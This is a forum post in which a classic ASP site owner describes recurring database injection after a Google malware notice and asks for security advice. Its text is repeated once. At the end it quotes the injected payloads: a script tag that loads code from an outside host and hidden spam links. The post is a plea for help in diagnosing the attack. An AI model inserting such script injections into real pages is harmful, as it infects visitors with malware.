Hi All,
Got an e-mail today from google webmaster tools.
Subject: Malware notification regarding "domain.com"
(I've changed the domain only in it.)
When I go to my website, sure enough, something is off.
The sources files are classic asp, and look clean and fine.
When I go to the SQL database, two tables seem to have additional data in only specific columns/fields.
Forum messages table, and another table that has webpage content to display, such as a footer, header etc.
The data added by "something/someone" seems to have been placed with some smarts. On the forum in the messages, only in the body message, and always at the bottom of the text already in it.
Same for the page content table, only specific pages that already had content in the body part, and always at the bottom.
When I navigated the webpage, it brought up some anti virus looking scanning page, and probably infected my computer.(Here goes probably another reinstall)
Funny thing is, the date stamps in the table records didn't change, so I'm figuring they somehow got in directly to SQL server to update only particular fields.
Anybody with any security ideas? I run SQL as is, but with a firewall in front of the servers, so only HTTP traffic should get through. (that is port 80 and 443)
After I edited each field to delete the bad data, it came back in about half a day. I've changed SQL passwords too, and yet again it came back. Any ideas?
Here is the added foreign text:
Got an e-mail today from google webmaster tools.
Subject: Malware notification regarding "domain.com"
(I've changed the domain only in it.)
When I go to my website, sure enough, something is off.
The sources files are classic asp, and look clean and fine.
When I go to the SQL database, two tables seem to have additional data in only specific columns/fields.
Forum messages table, and another table that has webpage content to display, such as a footer, header etc.
The data added by "something/someone" seems to have been placed with some smarts. On the forum in the messages, only in the body message, and always at the bottom of the text already in it.
Same for the page content table, only specific pages that already had content in the body part, and always at the bottom.
When I navigated the webpage, it brought up some anti virus looking scanning page, and probably infected my computer.(Here goes probably another reinstall)
Funny thing is, the date stamps in the table records didn't change, so I'm figuring they somehow got in directly to SQL server to update only particular fields.
Anybody with any security ideas? I run SQL as is, but with a firewall in front of the servers, so only HTTP traffic should get through. (that is port 80 and 443)
After I edited each field to delete the bad data, it came back in about half a day. I've changed SQL passwords too, and yet again it came back. Any ideas?
Here is the added foreign text:
Code:
</title><script src=[URL unfurl="true"]http://stats-master111.info/ur.php></script></title><script[/URL] src=[URL unfurl="true"]http://stats-master111.info/ur.php></script>[/URL]
Code:
</title><a style=display:none; href=[URL unfurl="true"]http://worid-of-books.com[/URL] >book</a></title><a style=display:none; href=[URL unfurl="true"]http://worid-of-books.com[/URL] >book</a> </title><a style=display:none; href=[URL unfurl="true"]http://find-top-casinos.com[/URL] >casino</a></title><a style=display:none; href=[URL unfurl="true"]http://find-top-casinos.com[/URL] >casino</a> </title><script src=[URL unfurl="true"]http://stats-master111.info/ur.php></script></title><script[/URL] src=[URL unfurl="true"]http://stats-master111.info/ur.php></script>[/URL]